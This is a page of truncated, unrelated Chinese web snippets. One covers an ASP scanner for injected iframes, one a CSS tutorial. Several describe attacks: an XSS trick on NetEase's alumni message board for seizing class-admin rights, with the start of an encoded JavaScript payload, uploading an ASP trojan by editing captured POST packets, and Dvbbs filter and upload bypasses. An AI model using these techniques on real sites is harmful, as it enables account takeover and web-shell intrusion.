增加了对iframe,script的检查，可以恢复被大量置入iframe的网页。免得手动去删除的麻烦。virus_lib.asp增加了对iframe,script的控制参数分别为：ConstremoveIframe=true'是否检查iframeConstIframeKey="3322"'iframe中的关键字，如果出现系统将自动清除ConstremoveScript=true'是否检查scriptConstScriptKey="3322"'script中的关键字，如果出现系统将自动清除ConstScanFileType="asp,cer,asa,cdx,htm,html"'扫描文件类型本程序...

[html]<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>利用 CSS + <em>标签 来完成一个三角形的制作</title> <style type="text/css"> <!-- #menu {width...

1.方法：网易同学录留言功能存在跨站，这里演示一个利用它把自己加为班级管理员的方法。在留言框里填写：+++try%20%7B%0D%0A%09var%20as%20%3D%20document.getElementsByTagName%28%22a%22%29%3B%0D%0A%09var%20frm%20%3D%20document.getElementsByTagName%28%22iframe%22%29%5B0%5D%3B%0D%0A%09frm.onload%20%3D%20function%28%29%20%7B%0D%0A%09%09var%20oFrm%20%3D%20docu...

涉及到大部分：如动网  还有星空的NF_visual_upfile.asp找到 upload.asp 等等上传图片的地方可以看源代码中有 filepath 或者file，path的字运行WSockExper抓包上传一个asp木马在WSockExper 找到 post …… 的2行 全选 复制到一个txt的文本里  修改：两个底部都要空一行把底下的asp 格式修改成gif 格式-----------------有时要修改上面的数字参数,最...

各种漏洞的利用和一些搜索参数  说到漏洞，首先应该提到的就是动网的上传漏洞了。  "洞网"漏洞拉开了上传漏洞文件的序幕，其他系统的上  传漏洞接踵而来!  asp动网论坛漏洞分析  1、这个漏洞不算太严重，用过动网论坛的人都知道，发帖时直接写javascript会被过滤拆分，写http会自动加上链接，漏洞就在此，在这两个地方变通一下，把两个单词的某个字母换成编码形式，然后系统再对应地解码回字母，就达到了避免被过滤的目的。例子说明一下，在发帖时写入［img］javas&...

Part I 前言 现在网上最流行的网站攻击手段，要数得上SQL Injection了，虽然SI技术易学易用，并且容易取得较大的权限，但因其风头实在太大，现在一般稍有点安全意识的程序员都会注意到这个问题，并且通过GET方法提交的数据会被服务器记录在案，而让网管很容易找到入侵者。 非SI类攻击相对来说获得的服务器操作权限不大，但对于以获得数据为目的的入侵还是很有用的。 Part II 方法介绍 常规的非SI类攻击有如下几种： 一、 跨站脚本攻击(XSS) 跨站脚本攻击不会直接对...